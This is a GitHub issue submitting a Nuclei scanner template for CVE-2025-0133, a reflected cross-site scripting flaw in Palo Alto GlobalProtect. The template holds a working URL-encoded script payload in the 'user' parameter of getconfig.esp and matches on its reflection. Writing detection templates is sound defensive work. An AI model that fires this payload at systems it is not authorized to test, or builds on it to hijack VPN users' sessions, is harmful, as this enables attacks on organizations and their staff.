### ISSUE TITLE
[TEMPLATE CONTRIBUTION] CVE-2025-0133 PAN-OS: Reflected Cross-Site Scripting (XSS) Vulnerability in GlobalProtect Gateway and Portal

### ISSUE THREAD

**Issue by Nour1042** [projectdiscovery/nuclei-templates#12442]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: paloalto-globalprotect-reflected-xss

info:
  name: Palo Alto GlobalProtect Reflected XSS
  author: mitsec
  severity: high
  description: |
    Reflected Cross-Site Scripting (XSS) in Palo Alto GlobalProtect VPN via the `user` parameter in `/ssl-vpn/getconfig.esp`.
  reference:
    - https://example.com/cve-2025-0133
  tags: xss,reflected,paloalto,globalprotect,vpn

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22mitsec%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=(empty_domain)&computer=computer"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>prompt("mitsec")</script>'
        part: body

      - type: status
        status:
          - 200
```

### Relevant dumped responses

```shell

```
